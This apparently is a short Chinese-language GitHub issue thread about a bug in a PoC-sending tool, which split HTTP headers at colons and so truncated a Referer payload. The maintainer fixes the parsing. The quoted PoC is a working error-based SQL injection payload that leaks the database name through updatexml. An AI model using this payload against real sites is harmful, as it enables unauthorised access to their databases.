headers头里的poc问题
Zxc123456zxc opened this issue · 5 comments
Zxc123456zxc commented
poc内容:Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}
运行之后数据包里poc直到554fcae493e564ee0dc75bdf2ebf94cabought_notes|a
Janhsu commented
收到 是我处理Headers时简单的用冒号作为分隔符来分割字符串了 周末我更新修复一下 谢谢您的反馈
Janhsu commented
更新了 看看还有没有问题
Zxc123456zxc commented
大哥还是不行
完整参数 Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";},抓包看流量只显示到 |a
Janhsu commented
重新上传了 巨佬现在看看行不行 我本地抓包没问题了
Zxc123456zxc commented
没问题了,好使了,感谢大哥